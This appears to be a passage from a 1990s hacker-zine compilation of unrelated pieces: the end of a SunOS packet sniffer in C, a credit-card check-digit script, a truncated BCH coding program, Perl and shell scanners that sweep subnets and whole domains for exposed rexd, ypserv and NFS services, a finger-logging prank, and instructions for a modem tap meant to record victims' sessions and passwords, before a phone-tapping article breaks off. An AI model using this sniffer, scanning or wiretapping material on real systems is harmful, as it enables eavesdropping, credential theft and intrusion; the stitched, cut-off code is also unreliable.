si.ic_len = sizeof(timeout);
|
|||
|
si.ic_dp = (char *)&timeout;
|
|||
|
if(ioctl(if_fd, I_STR, (char *)&si) < 0)
|
|||
|
Pexit(1,"Eth: ioctl (I_STR: NIOCSTIME)");
|
|||
|
|
|||
|
si.ic_cmd = NIOCSCHUNK;
|
|||
|
si.ic_len = sizeof(chunksize);
|
|||
|
si.ic_dp = (char *)&chunksize;
|
|||
|
if(ioctl(if_fd, I_STR, (char *)&si) < 0)
|
|||
|
Pexit(1,"Eth: ioctl (I_STR: NIOCSCHUNK)");
|
|||
|
|
|||
|
strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name));
|
|||
|
ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0';
|
|||
|
si.ic_cmd = NIOCBIND;
|
|||
|
si.ic_len = sizeof(ifr);
|
|||
|
si.ic_dp = (char *)𝔦
|
|||
|
if(ioctl(if_fd, I_STR, (char *)&si) < 0)
|
|||
|
Pexit(1,"Eth: ioctl (I_STR: NIOCBIND)");
|
|||
|
|
|||
|
si.ic_cmd = NIOCSFLAGS;
|
|||
|
si.ic_len = sizeof(if_flags);
|
|||
|
si.ic_dp = (char *)&if_flags;
|
|||
|
if(ioctl(if_fd, I_STR, (char *)&si) < 0)
|
|||
|
Pexit(1,"Eth: ioctl (I_STR: NIOCSFLAGS)");
|
|||
|
|
|||
|
if(ioctl(if_fd, I_FLUSH, (char *)FLUSHR) < 0)
|
|||
|
Pexit(1,"Eth: ioctl (I_FLUSH)");
|
|||
|
}
|
|||
|
|
|||
|
while ((cc = read(if_fd, buf, CHUNKSIZE)) >= 0) {
|
|||
|
register char *bp = buf,
|
|||
|
*bufstop = (buf + cc);
|
|||
|
|
|||
|
while (bp < bufstop) {
|
|||
|
register char *cp = bp;
|
|||
|
register struct nit_bufhdr *hdrp;
|
|||
|
|
|||
|
hdrp = (struct nit_bufhdr *)cp;
|
|||
|
cp += sizeof(struct nit_bufhdr);
|
|||
|
bp += hdrp->nhb_totlen;
|
|||
|
filter(cp, (u_long)hdrp->nhb_msglen);
|
|||
|
}
|
|||
|
}
|
|||
|
Pexit((-1),"Eth: read");
|
|||
|
}
|
|||
|
/* Authorize your proogie,generate your own password and uncomment here */
|
|||
|
/* #define AUTHPASSWD "EloiZgZejWyms" */
|
|||
|
|
|||
|
void getauth()
|
|||
|
{ char *buf,*getpass(),*crypt();
|
|||
|
char pwd[21],prmpt[81];
|
|||
|
|
|||
|
strcpy(pwd,AUTHPASSWD);
|
|||
|
sprintf(prmpt,"(%s)UP? ",ProgName);
|
|||
|
buf=getpass(prmpt);
|
|||
|
if(strcmp(pwd,crypt(buf,pwd)))
|
|||
|
exit(1);
|
|||
|
}
|
|||
|
*/
|
|||
|
void main(argc, argv)
|
|||
|
int argc;
|
|||
|
char **argv;
|
|||
|
{
|
|||
|
char cbuf[BUFSIZ];
|
|||
|
struct ifconf ifc;
|
|||
|
int s,
|
|||
|
ac=1,
|
|||
|
backg=0;
|
|||
|
|
|||
|
ProgName=argv[0];
|
|||
|
|
|||
|
/* getauth(); */
|
|||
|
|
|||
|
LOG=NULL;
|
|||
|
device=NULL;
|
|||
|
while((ac<argc) && (argv[ac][0] == '-')) {
|
|||
|
register char ch = argv[ac++][1];
|
|||
|
switch(toupper(ch)) {
|
|||
|
case 'I': device=argv[ac++];
|
|||
|
break;
|
|||
|
case 'F': if(!(LOG=fopen((LogName=argv[ac++]),"a")))
|
|||
|
Zexit(1,"Output file cant be opened\n");
|
|||
|
break;
|
|||
|
case 'B': backg=1;
|
|||
|
break;
|
|||
|
case 'D': debug=1;
|
|||
|
break;
|
|||
|
default : fprintf(ERR,
|
|||
|
"Usage: %s [-b] [-d] [-i interface] [-f file]\n",
|
|||
|
ProgName);
|
|||
|
exit(1);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
if(!device) {
|
|||
|
if((s=socket(AF_INET, SOCK_DGRAM, 0)) < 0)
|
|||
|
Pexit(1,"Eth: socket");
|
|||
|
|
|||
|
ifc.ifc_len = sizeof(cbuf);
|
|||
|
ifc.ifc_buf = cbuf;
|
|||
|
if(ioctl(s, SIOCGIFCONF, (char *)&ifc) < 0)
|
|||
|
Pexit(1,"Eth: ioctl");
|
|||
|
|
|||
|
close(s);
|
|||
|
device = ifc.ifc_req->ifr_name;
|
|||
|
}
|
|||
|
|
|||
|
fprintf(ERR,"Using logical device %s [%s]\n",device,NIT_DEV);
|
|||
|
fprintf(ERR,"Output to %s.%s%s",(LOG)?LogName:"stdout",
|
|||
|
(debug)?" (debug)":"",(backg)?" Backgrounding ":"\n");
|
|||
|
|
|||
|
if(!LOG)
|
|||
|
LOG=stdout;
|
|||
|
|
|||
|
signal(SIGINT, death);
|
|||
|
signal(SIGTERM,death);
|
|||
|
signal(SIGKILL,death);
|
|||
|
signal(SIGQUIT,death);
|
|||
|
|
|||
|
if(backg && debug) {
|
|||
|
fprintf(ERR,"[Cannot bg with debug on]\n");
|
|||
|
backg=0;
|
|||
|
}
|
|||
|
|
|||
|
if(backg) {
|
|||
|
register int s;
|
|||
|
|
|||
|
if((s=fork())>0) {
|
|||
|
fprintf(ERR,"[pid %d]\n",s);
|
|||
|
exit(0);
|
|||
|
} else if(s<0)
|
|||
|
Pexit(1,"fork");
|
|||
|
|
|||
|
if( (s=open("/dev/tty",O_RDWR))>0 ) {
|
|||
|
ioctl(s,TIOCNOTTY,(char *)NULL);
|
|||
|
close(s);
|
|||
|
}
|
|||
|
}
|
|||
|
fprintf(LOG,"\nLog started at => %s [pid %d]\n",NOWtm(),getpid());
|
|||
|
fflush(LOG);
|
|||
|
|
|||
|
do_it();
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
#! /bin/nawk -f
|
|||
|
# validcc.awk - validate credit card #
|
|||
|
{
|
|||
|
# validate CardNo
|
|||
|
number=""
|
|||
|
CardNo = $0
|
|||
|
for (indig = 1; indig <= length(CardNo); indig++) {
|
|||
|
dig = substr(CardNo, indig, 1)
|
|||
|
if (dig ~ /^[0-9]$/)
|
|||
|
number = number dig
|
|||
|
else if (dig != " ") {
|
|||
|
print "bad character in CardNo" | "cat >&2"
|
|||
|
break
|
|||
|
}
|
|||
|
}
|
|||
|
digit1 = substr(number, 1, 1)
|
|||
|
cclen = length(number)
|
|||
|
if (digit1 == "3") {
|
|||
|
print "Sorry, we do not take American Express" | "cat >&2"
|
|||
|
# if (cclen != 15)
|
|||
|
# print "wrong length for CardNo" | "cat >&2"
|
|||
|
} else if (digit1 == "4") { # visa
|
|||
|
if (cclen != 13 && cclen != 16)
|
|||
|
print "wrong length for CardNo" | "cat >&2"
|
|||
|
} else if (digit1 == "5") { # master card
|
|||
|
if (cclen != 16)
|
|||
|
print "wrong length for CardNo" | "cat >&2"
|
|||
|
} else
|
|||
|
print "unknown credit card" | "cat >&2"
|
|||
|
if (cclen == 13)
|
|||
|
bias = 0
|
|||
|
else
|
|||
|
bias = 1
|
|||
|
for (llen = 1; llen <= cclen; llen++) {
|
|||
|
cdigit = digit = substr(number, llen, 1)
|
|||
|
if (((llen-1+bias)%2) == 1) # double every second digit
|
|||
|
cdigit *= 2
|
|||
|
if (cdigit > 9)
|
|||
|
cdigit -= 9 # compensate ...
|
|||
|
csum += cdigit # ... add up all the digits
|
|||
|
}
|
|||
|
if ((csum%10) != 0)
|
|||
|
print "bad CardNo" | "cat >&2"
|
|||
|
}
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
/* File: bch2.c
|
|||
|
|
|||
|
====== Encoder/Decoder of binary primitive BCH codes ======
|
|||
|
|
|||
|
Robert Morelos-Zaragoza, University of Hawaii 5/19/92
|
|||
|
|
|||
|
This program computes the generator polynomial of the code by
|
|||
|
using cycle sets modulo n, n = 2^m - 1.
|
|||
|
|
|||
|
(Part of this program is adapted from a Reed-Solomon encoder/decoder
|
|||
|
program, 'rs.c', for the binary case. rs.c was created by Simon
|
|||
|
Rockliff, University of Adelaide 21/9/89)
|
|||
|
|
|||
|
Main variables:
|
|||
|
|
|||
|
m = order of the field GF(2**m)
|
|||
|
n = 2**m - 1 = length
|
|||
|
t = error correcting capability
|
|||
|
d = 2*t + 1 = designed minimum distance
|
|||
|
k = n - deg(g(x)) = dimension
|
|||
|
|
|||
|
p[] = primitive polynomial to generate GF(2**m)
|
|||
|
(read from least to most significant coefficient)
|
|||
|
|
|||
|
g[] = generator polynomial
|
|||
|
|
|||
|
alpha_to [] = log table in GF(2**m)
|
|||
|
index_of[] = antilog table in GF(2**m)
|
|||
|
data[] = data polynomial
|
|||
|
bb[] = redundancy polynomial = x**(n-k) data[] modulo g[]
|
|||
|
|
|||
|
numerr = number of errors
|
|||
|
errpos[] = error positions
|
|||
|
|
|||
|
recd[] = received polynomial
|
|||
|
decerror = number of decoding errors ( in MESSAGE positions)
|
|||
|
|
|||
|
*/
|
|||
|
|
|||
|
#include <math.h>
|
|||
|
#include <stdio.h>
|
|||
|
|
|||
|
int m, n, k, t, d ;
|
|||
|
int p [20] ; /* irreducible polynomial */
|
|||
|
int alpha_to [1024], index_of [1024], g [1024] ;
|
|||
|
int recd [1024], data [1024], bb [1024] ;
|
|||
|
int numerr, errpos [1024], decerror = 0 ;
|
|||
|
int seed;
|
|||
|
|
|||
|
|
|||
|
|
|||
|
void read_p()
|
|||
|
/* Read primitive polynomial of degree m */
|
|||
|
{
|
|||
|
register int i;
|
|||
|
|
|||
|
printf("Enter m and primitive polynomial p(x): "); scanf("%d", &m);
|
|||
|
for (i=0; i<=m; i++)
|
|||
|
scanf("%d", &p[i]);
|
|||
|
printf("p(x) = ");
|
|||
|
for (i=0; i<=m; i++)
|
|||
|
printf("%1d", p[i]);
|
|||
|
printf("\n");
|
|||
|
n = (int)(pow(2.0,(double) m)) - 1;
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
|
|||
|
void generate_gf()
|
|||
|
/* generate GF(2**m) from the irreducible polynomial p(X) in p[0]..p[m]
|
|||
|
lookup tables: index->polynomial form alpha_to[] contains j=alpha**i;
|
|||
|
polynomial form -> index form index_of[j=alpha**i] = i
|
|||
|
alpha=2 is the primitive element of GF(2**m)
|
|||
|
*/
|
|||
|
{
|
|||
|
register int i, mask ;
|
|||
|
|
|||
|
mask = 1 ;
|
|||
|
alpha_to[m] = 0 ;
|
|||
|
for (i=0; i<m; i++)
|
|||
|
{ alpha_to[i] = mask ;
|
|||
|
index_of[alpha_to[i]] = i ;
|
|||
|
if (p[i]!=0)
|
|||
|
alpha_to[m] ^= mask ;
|
|||
|
mask <<= 1 ;
|
|||
|
}
|
|||
|
index_of[alpha_to[m]] = m ;
|
|||
|
mask >>= 1 ;
|
|||
|
for (i=m+1; i<n; i++)
|
|||
|
{ if (alpha_to[i-1] >= mask)
|
|||
|
alpha_to[i] = alpha_to[m] ^ ((alpha_to[i-1]^mask)<<1) ;
|
|||
|
else alpha_to[i] = alpha_to[i-1]<<1 ;
|
|||
|
index_of[alpha_to[i]] = i ;
|
|||
|
}
|
|||
|
index_of[0] = -1 ;
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
void gen_poly()
|
|||
|
/* Compute generator polynomial of BCH code of length n=2^m - 1 */
|
|||
|
{
|
|||
|
register int ii, jj, ll, kaux;
|
|||
|
int test, aux, nocycles, root, noterms, rdncy;
|
|||
|
int cycle[256][11], size[256], min[128], zeros[256];
|
|||
|
|
|||
|
/* Generate cycle sets modulo n, n = 2^m - 1 */
|
|||
|
cycle[0][0] = 0; size[0] = 1;
|
|||
|
cycle[1][0] = 1; size[1] = 1;
|
|||
|
jj = 1; /* cycle set index */
|
|||
|
printf("Computing cycle sets modulo %d ...\n", n);
|
|||
|
do
|
|||
|
{
|
|||
|
/* Generate the jj-th cycle set */
|
|||
|
ii = 0;
|
|||
|
do
|
|||
|
{
|
|||
|
ii++;
|
|||
|
cycle[jj][ii] = (cycle[jj][ii-1]*2) % n;
|
|||
|
size[jj]++;
|
|||
|
aux = (cycle[jj][ii]*2) % n;
|
|||
|
} while ( aux != cycle[jj][0] );
|
|||
|
printf(" %d ", jj);
|
|||
|
if (jj && ( (jj % 10) == 0)) printf("\n");
|
|||
|
/* Next cycle set representative */
|
|||
|
ll = 0;
|
|||
|
do
|
|||
|
{
|
|||
|
ll++;
|
|||
|
test = 0;
|
|||
|
for (ii=1; ((ii<=jj) && (!test)); ii++)/* Examine previous cycle
|
|||
|
sets */
|
|||
|
for (kaux=0; ((kaux<size[ii]) && (!test)); kaux++)
|
|||
|
if (ll == cycle[ii][kaux]) test = 1;
|
|||
|
} while ( (test) && (ll<(n-1)) );
|
|||
|
if (!(test))
|
|||
|
{
|
|||
|
jj++; /* next cycle set index */
|
|||
|
cycle[jj][0] = ll;
|
|||
|
size[jj] = 1;
|
|||
|
}
|
|||
|
} while (ll < (n-1));
|
|||
|
printf(" ... Done\n");
|
|||
|
nocycles = jj; /* number of cycle sets modulo n */
|
|||
|
#ifdef DEBUG
|
|||
|
printf("Cycle sets modulo %d:\n", n);
|
|||
|
for (ii=0; ii<=nocycles; ii++) {
|
|||
|
for (jj=0; jj<size[ii]; jj++)
|
|||
|
printf("%d ",cycle[ii][jj]);
|
|||
|
printf("\n"); }
|
|||
|
#endif
|
|||
|
|
|||
|
printf("Enter t: "); scanf("%d", &t);
|
|||
|
d = 2*t+1;
|
|||
|
/* Search for roots 1, 2, ..., d-1 in cycle sets */
|
|||
|
kaux = 0;
|
|||
|
rdncy = 0;
|
|||
|
for (ii=1; ii<=nocycles; ii++)
|
|||
|
{
|
|||
|
min[kaux] = 0;
|
|||
|
for (jj=0; jj<size[ii]; jj++)
|
|||
|
for (root=1; root<d; root++)
|
|||
|
if (root == cycle[ii][jj])
|
|||
|
min[kaux] = ii;
|
|||
|
if (min[kaux])
|
|||
|
{
|
|||
|
rdncy += size[min[kaux]];
|
|||
|
kaux++;
|
|||
|
}
|
|||
|
}
|
|||
|
noterms = kaux;
|
|||
|
#ifdef DEBUG
|
|||
|
printf("roots: ", noterms);
|
|||
|
#endif
|
|||
|
kaux = 1;
|
|||
|
for (ii=0; ii<noterms; ii++)
|
|||
|
for (jj=0; jj<size[min[ii]]; jj++)
|
|||
|
{
|
|||
|
zeros[kaux] = cycle[min[ii]][jj];
|
|||
|
#ifdef DEBUG
|
|||
|
printf("%d ", zeros[kaux]);
|
|||
|
#endif
|
|||
|
kaux++;
|
|||
|
}
|
|||
|
k = n - rdncy;
|
|||
|
printf("This is a (%d, %d, %d) binary BCH code\n", n, k, d);
|
|||
|
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
#!/bin/perl -s
|
|||
|
#
|
|||
|
# Scan a subnet for valid hosts; if given hostname, will look at the
|
|||
|
# 255 possible hosts on that net. Report if host is running rexd or
|
|||
|
# ypserv.
|
|||
|
#
|
|||
|
# Usage: scan n.n.n.n
|
|||
|
|
|||
|
# mine, by default
|
|||
|
$default = "130.80.26";
|
|||
|
|
|||
|
$| = 1;
|
|||
|
|
|||
|
if ($v) { $verbose = 1; }
|
|||
|
|
|||
|
if ($#ARGV == -1) { $root = $default; }
|
|||
|
else { $root = $ARGV[0]; }
|
|||
|
|
|||
|
# ip address
|
|||
|
if ($root !~ /[0-9]+\.[0-9]+\.[0-9]+/) {
|
|||
|
($na, $ad, $ty, $le, @host_ip) = gethostbyname($root);
|
|||
|
($one,$two,$three,$four) = unpack('C4',$host_ip[0]);
|
|||
|
$root = "$one.$two.$three";
|
|||
|
if ($root eq "..") { die "Can't figure out what to scan...\n"; }
|
|||
|
}
|
|||
|
|
|||
|
print "Subnet $root:\n" if $verbose;
|
|||
|
for $i (01..255) {
|
|||
|
print "Trying $root.$i\t=> " if $verbose;
|
|||
|
&resolve("$root.$i");
|
|||
|
}
|
|||
|
|
|||
|
#
|
|||
|
# Do the work
|
|||
|
#
|
|||
|
sub resolve {
|
|||
|
|
|||
|
local($name) = @_;
|
|||
|
|
|||
|
# ip address
|
|||
|
if ($name =~ /[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/) {
|
|||
|
($a,$b,$c,$d) = split(/\./, $name);
|
|||
|
@ip = ($a,$b,$c,$d);
|
|||
|
($name) = gethostbyaddr(pack("C4", @ip), &AF_INET);
|
|||
|
}
|
|||
|
else {
|
|||
|
($name, $aliases, $type, $len, @ip) = gethostbyname($name);
|
|||
|
($a,$b,$c,$d) = unpack('C4',$ip[0]);
|
|||
|
}
|
|||
|
|
|||
|
if ($name && @ip) {
|
|||
|
print "$a.$b.$c.$d\t$name\n";
|
|||
|
system("if ping $name 5 > /dev/null ; then\nif rpcinfo -u $name 100005 > /dev/null ; then showmount -e $name\nfi\nif rpcinfo -t $name 100017 > /dev/null ; then echo \"Running rexd.\"\nfi\nif rpcinfo -u $name 100004 > /dev/null ; then echo \"R
|
|||
|
unning ypserv.\"\nfi\nfi");
|
|||
|
}
|
|||
|
else { print "unable to resolve address\n" if $verbose; }
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
sub AF_INET {2;}
|
|||
|
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
#!/bin/sh
|
|||
|
#rpc.chk 1.0
|
|||
|
#
|
|||
|
# Make sure you have got a newer version of Bourne Shell (SVR2 or newer)
|
|||
|
# that supports functions. It's usually located in /bin/sh5 (under ULTRIX OS)
|
|||
|
# or /bin/sh (Sun OS, RS/6000 etc) If it's located elsewhere, feel free to
|
|||
|
# change the magic number, indicating the type of executable Bourne Shell.
|
|||
|
#
|
|||
|
# The script obtains via nslookup utility a list of hostnames from a nameserver
|
|||
|
# and checks every entry of the list for active rexd procedures as well as
|
|||
|
# ypserver procedures. The output is a list of the sites that run those
|
|||
|
# daemons and are insecure.
|
|||
|
# -yo.
|
|||
|
|
|||
|
|
|||
|
domainname=$1
|
|||
|
umask 022
|
|||
|
PATH=/bin:/usr/bin:/usr/ucb:/usr/etc:/usr/local/bin ; export PATH
|
|||
|
|
|||
|
#
|
|||
|
# Function collects a list of sites
|
|||
|
# from a nameserver. Make sure you've got the nslookup utility.
|
|||
|
#
|
|||
|
get_list() {
|
|||
|
(
|
|||
|
echo set type=ns
|
|||
|
echo $domainname
|
|||
|
) | nslookup | egrep "nameserv" | cut -d= -f2> .tmp$$ 2>/dev/null
|
|||
|
if [ ! -s .tmp$$ ]; then
|
|||
|
echo "No such domain" >&2
|
|||
|
echo "Nothing to scan" >&2
|
|||
|
exit 1
|
|||
|
fi
|
|||
|
for serv in `cat .tmp$$`;do
|
|||
|
(
|
|||
|
echo server $serv
|
|||
|
echo ls $domainname
|
|||
|
) | nslookup > .file$$ 2>/dev/null
|
|||
|
lines=`cat .file$$ | wc -l`
|
|||
|
tail -`expr $lines - 7` .file$$ | cut -d" " -f2 > .file.tmp # .file
|
|||
|
sed -e "s/$/.$domainname/" .file.tmp > .hosts$$
|
|||
|
rm -rf .file* .tmp$$
|
|||
|
sort .hosts$$ | uniq -q >> HOSTS$$; rm -rf .hosts$$
|
|||
|
done
|
|||
|
tr 'A-Z' 'a-z' <HOSTS$$ |sort|uniq -q > HOSTS.$domainname;rm -rf HOSTS$$
|
|||
|
}
|
|||
|
|
|||
|
# Function
|
|||
|
|
|||
|
rpc_calls()
|
|||
|
{
|
|||
|
for entry in `cat HOSTS.$domainname`; do
|
|||
|
(
|
|||
|
rpcinfo -t $entry ypserv >/dev/null && echo $entry runs YPSERV || exit 1 # Error!
|
|||
|
) >> .log 2>/dev/null
|
|||
|
(
|
|||
|
rpcinfo -t $entry rex >/dev/null && echo $entry runs REXD || exit 1 # Error !
|
|||
|
) >> .log 2>/dev/null
|
|||
|
done
|
|||
|
}
|
|||
|
|
|||
|
# Main
|
|||
|
|
|||
|
if [ "$domainname" = '' ]; then
|
|||
|
echo "Usage $0 domainname" >&2
|
|||
|
exit 1
|
|||
|
fi
|
|||
|
get_list
|
|||
|
echo "Checking $domainname domain" > .log
|
|||
|
echo "*****************************" >> .log
|
|||
|
echo "Totally `cat HOSTS.$domainname | wc -l` sites to scan" >> .log
|
|||
|
echo "******************************" >> .log
|
|||
|
echo "started at `date`" >> .log
|
|||
|
echo "******************************" >> .log
|
|||
|
rpc_calls
|
|||
|
echo "******************************" >> .log
|
|||
|
echo "finished at `date`" >> .log
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
The Ultimate Finger/Mail Hack
|
|||
|
|
|||
|
by
|
|||
|
|
|||
|
Emanon
|
|||
|
|
|||
|
(a.k.a. WinterHawk)
|
|||
|
|
|||
|
|
|||
|
This program will keep a log of who fingers you on your local host and tell
|
|||
|
you when the finger was performed. As an added tease, it will send email to
|
|||
|
the person doing the fingering telling them that you know who they are and
|
|||
|
you know when they fingered you, even when you are not logged on.
|
|||
|
|
|||
|
Easy to follow steps:
|
|||
|
|
|||
|
[This is a comment]
|
|||
|
|
|||
|
[ALL OF THE FOLLOWING FILES ARE TO GO IN YOUR HOME DIRECTORY!!!]
|
|||
|
|
|||
|
[Get to your home directory]
|
|||
|
% cd
|
|||
|
|
|||
|
[Make a file called .mailscript and include the following source code]
|
|||
|
[MAKE THE APPROPRIATE CHANGES TO PATH NAMES WHERE NECESSARY!!!]
|
|||
|
% cat .mailscript
|
|||
|
#!bin/sh
|
|||
|
MYNAME=your_account_name # JUST YOUR LOCAL ACCOUNT NAME, NOT THE FULL ADDRESS!!!
|
|||
|
HOME=/your/full/home/path/goes/here
|
|||
|
SUCKER=`ps -fau | grep 'finger $MYNAME' | grep -v 'grep' | awk '{print $1}'`
|
|||
|
echo "$SUCKER fingered you on `date`" | cat >> $HOME/.fingerlog
|
|||
|
echo "$MYNAME knows that you fingered him on `date`" | mail -s 'Sucker!' $SUCKER
|
|||
|
|
|||
|
[On some systems, the `u' flag is not necessary for the `ps' command]
|
|||
|
[On most systems, you will not have to (re)declare the $HOME variable]
|
|||
|
[If you do not want the fingerer to receive email, remove the last line]
|
|||
|
[You may wish to hard code your account name, rather than using the variable]
|
|||
|
|
|||
|
[Make a file called fingerLog.c and include the following source code]
|
|||
|
[MAKE THE APPROPRIATE CHANGES TO PATH NAMES WHERE NECESSARY!!!]
|
|||
|
% cat fingerLog.c
|
|||
|
#include <stdio.h>
|
|||
|
#include <sys/file.h>
|
|||
|
main()
|
|||
|
{
|
|||
|
int x, pipeHandle, planHandle;
|
|||
|
char * pipeFile = "/your/full/home/path/goes/here/.plan";
|
|||
|
char * planFile = "/your/full/home/path/goes/here/.realplan";
|
|||
|
char buf[1024];
|
|||
|
for(;;){
|
|||
|
pipeHandle=open(pipeFile,O_WRONLY);
|
|||
|
planHandle=open(planFile,O_RDONLY);
|
|||
|
while((x=read(planHandle,buf,sizeof(buf)))>0)
|
|||
|
write(pipeHandle,buf,x);
|
|||
|
system("sh /your/full/home/path/goes/here/.mailscript");
|
|||
|
close(pipeHandle);
|
|||
|
close(planHandle);
|
|||
|
sleep(3);}
|
|||
|
}
|
|||
|
|
|||
|
[Compile the fingerLog.c program]
|
|||
|
% cc fingerLog.c -o fingerLog
|
|||
|
|
|||
|
[You may want to use a more inconspicuous name for the executable file]
|
|||
|
|
|||
|
[Move you .plan file to .realplan]
|
|||
|
% mv .plan .realplan
|
|||
|
|
|||
|
[Make a piped FIFO .plan file]
|
|||
|
% mknod .plan p
|
|||
|
|
|||
|
[Allow people to view your bogus .plan file]
|
|||
|
% chmod 755 .plan
|
|||
|
|
|||
|
[Run fingerLog in the background]
|
|||
|
% nohup fingerLog > /dev/null &
|
|||
|
|
|||
|
[Optional clean up]
|
|||
|
% rm fingerLog.c
|
|||
|
|
|||
|
PROBLEMS: On some machines, the [ps -fau] option will not reveal what account
|
|||
|
a person is actually fingering. In this case, you can remove all
|
|||
|
instances of the $MYNAME variable from the [.mailscript] file.
|
|||
|
However, it is entirely possible that two people may be performing a
|
|||
|
finger at the same time and the script may log the wrong one. If you
|
|||
|
do have to omit the $MYNAME variable, I strongly suggest that you
|
|||
|
also remove the email option. And, you might as well change the [ps]
|
|||
|
command to a simple [w], like so:
|
|||
|
|
|||
|
SUCKER=`w | grep 'finger' | grep -v 'grep' | awk '{print $1}'`
|
|||
|
|
|||
|
Also, if the system you are on is bogged down with a lot of
|
|||
|
processes, the script may not find the fingerer before the process
|
|||
|
is terminated, thus logging the time without an appropriate account
|
|||
|
name, and not sending the email. So far, there has only been one
|
|||
|
system where I could only use the program to log the times that I
|
|||
|
had been fingered, no account names and no email :(
|
|||
|
|
|||
|
That's It! Of course, this is not a perfect bug free program. It should run
|
|||
|
all the time [even when you are not logged on] so you only need to run it
|
|||
|
once. If it does quit for some reason [like when the sysop kills it], you can
|
|||
|
simply restart it. For those of you privileged enough to be using Korn shell,
|
|||
|
you can add the following code to your [.profile] that will check to see if
|
|||
|
fingerLog is running whenever you log in. If it isn't, it will restart it for
|
|||
|
you. I'm sure that this can be modified to work with Bourne and C shell (if it
|
|||
|
doesn't already), but I'll leave that up to you.
|
|||
|
|
|||
|
ps x | grep 'fingerLog' | grep -v 'grep' > /dev/null
|
|||
|
if (( $? != 0 )); then nohup fingerLog > /dev/null &
|
|||
|
fi
|
|||
|
|
|||
|
Let me say this one more time so that there is no confusion, "This only works
|
|||
|
on your LOCAL host!!!" People who finger you from a remote host will see your
|
|||
|
[.realplan] file, just like everyone else, but they will *NOT* receive the
|
|||
|
email. It will appear in your .fingerlog as an empty account name. If and when
|
|||
|
someone does revise this to work with remote hosts (most likely using the
|
|||
|
netstat command), please email me a copy at:
|
|||
|
|
|||
|
tdavis@garnet.acns.fsu.edu
|
|||
|
|
|||
|
As a matter of fact, there is a lot of room for improvement. If *ANYONE* makes
|
|||
|
*ANY* revisions, please have the courtesy to email me a copy and explain what
|
|||
|
changes you have made. Thanks. Enjoy!
|
|||
|
|
|||
|
Assembly: WinterHawk bows humbly to Cat and Fuzz.
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
+----------------------+
|
|||
|
| Building A Modem Tap |
|
|||
|
| by: phigan |
|
|||
|
+----------------------+
|
|||
|
|
|||
|
Many of you have probably heard of, seen, or maybe even built a
|
|||
|
phone tap. Not a very difficult device to make. I got the idea of making
|
|||
|
a modem tap from a computer underground book that I saw over at my local
|
|||
|
Spy Headquarters (I'm not sure if this is a store that is only here in
|
|||
|
602 or not but its got shitloads of spy equipment such as video
|
|||
|
surveillance, fake ids, useful literature, fake bombs, very small bugs,
|
|||
|
etc.). First of all, here is the schematic for making a phone tap to
|
|||
|
record to cassette.
|
|||
|
|
|||
|
Parts
|
|||
|
~~~~~
|
|||
|
1) RCA-type jack
|
|||
|
to tape recorder
|
|||
|
mic input
|
|||
|
1) 10k(p)ohm : 20k(s) ohm
|
|||
|
transformer
|
|||
|
1) .005 mfd capacitor
|
|||
|
|
|||
|
Schematic
|
|||
|
~~~~~~~~~
|
|||
|
To line
|
|||
|
+--------------------------+ | |
|
|||
|
| | | |
|
|||
|
(+-----------+ | | |
|
|||
|
RCA | Transformer | | |
|
|||
|
jack +^^^^^^^^^^^^^+ | |
|
|||
|
+-------------+ | |
|
|||
|
| | | |
|
|||
|
| +----------------+
|
|||
|
| | |
|
|||
|
+----------||------------+ |
|
|||
|
.005 mfd | |
|
|||
|
|
|||
|
The main purpose for a modem tap such as this is to set it up at
|
|||
|
someone's house or maybe an office building that you know dials out with
|
|||
|
modems and you can record all the keystrokes that have been entered.
|
|||
|
With this next schematic, you can simply play the cassette back through
|
|||
|
your modem and easily print out the entire session having logged
|
|||
|
passwords and so on. Good way of getting CBI accounts also.
|
|||
|
|
|||
|
Parts
|
|||
|
~~~~~
|
|||
|
1) RCA type jack
|
|||
|
from tape recorder
|
|||
|
ext. speaker
|
|||
|
1) 100 Ohm restistor
|
|||
|
1) bell-type phone jack (@)
|
|||
|
|
|||
|
Schematic
|
|||
|
~~~~~~~~~
|
|||
|
|
|||
|
+-------+ ____________________ RCA jack
|
|||
|
----| Modem | @----<_________/\/\/\_____>(+
|
|||
|
+-------+ phone 100 Ohm
|
|||
|
jack
|
|||
|
|
|||
|
When you have a recording of your victim's session, simply fire
|
|||
|
up your terminal program and treat it as you would any other modem
|
|||
|
connection. If you are smart enough, you may even be able to combine
|
|||
|
these two and make an acoustic modem module for a regular laptop modem
|
|||
|
(hint hint payphones hint hint). I have seen this done in a mail-order
|
|||
|
mag.
|
|||
|
It said that the acoustic module could handle 9600 baud and if you have
|
|||
|
good
|
|||
|
enough rubber cups (like they did on their model) then you will
|
|||
|
have absolutely no line noise. Anyway, if you have any problems, feel
|
|||
|
free to email me at 15660@ef.gc.maricopa.edu or you may find me on IRC
|
|||
|
as phigan on channels #phreak, #hack, or sometimes #c-64.
|
|||
|
|
|||
|
|
|||
|
,,,
|
|||
|
(o o)
|
|||
|
.---------------oOO---(_)---OOo---------------.
|
|||
|
| PHiGAN/6o2 IBM/Amiga/8-Bit |
|
|||
|
| ANSi/VGA/Coding Member: NWPAC |
|
|||
|
| Hi-Res/8-Bit/Musix SysOp: |
|
|||
|
| 15660@ef.gc.maricopa.edu -The PhAcS Machine |
|
|||
|
`---------------------------------------------'
|
|||
|
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
Phone Tapping with a personal stereo !!!
|
|||
|
brought to you by
|
|||
|
|
|||
|
Harlequin
|
|||
|
|
|||
|
Here in the UK, we have a reasonably secure phone system, mainly
|
|||
|
because the whole system is run by our beloved phone company British
|
|||
|
Telecom, even the private phone companies have to rent their lines off BT.
|
|||
|
|
|||
|
BUT, due to something or other I don't entirely understand here's
|
|||
|
how to listen in to phone conversations with a personal stereo.
|
|||
|
|
|||
|
I was lying in bed one night trying desperately to read my book,
|
